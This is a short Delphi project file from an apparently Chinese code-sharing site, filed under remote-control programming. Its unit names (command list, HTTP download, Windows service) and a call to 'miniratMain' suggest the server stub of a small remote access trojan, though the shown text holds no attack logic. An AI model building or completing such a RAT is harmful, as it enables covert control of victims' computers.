debug.dpr
上传用户:sinothink
上传日期:2022-07-15
资源大小:459k
文件大小:0k
源码类别:

远程控制编程

开发平台:

Delphi

  1. program debug;
  2. {$R 'Serverdll.res' 'Serverdll.rc'}
  3. uses
  4.   UStart in 'UStart.pas',
  5.   URsConst in '..URsConst.pas',
  6.   untCMDList in 'ServeruntCMDList.pas',
  7.   untHTTPDownload in 'ServeruntHTTPDownload.pas',
  8.   UServer in 'ServerUserver.pas',
  9.   SWintService in 'SWintService.pas',
  10.   WinSvcEx in '..WinSvcEx.pas';
  11. {$R *.RES}
  12. begin
  13.    ConfigFile:='d:new.exe';
  14.    ReadSettings(@PieZhi);
  15.    miniratMain;
  16. end.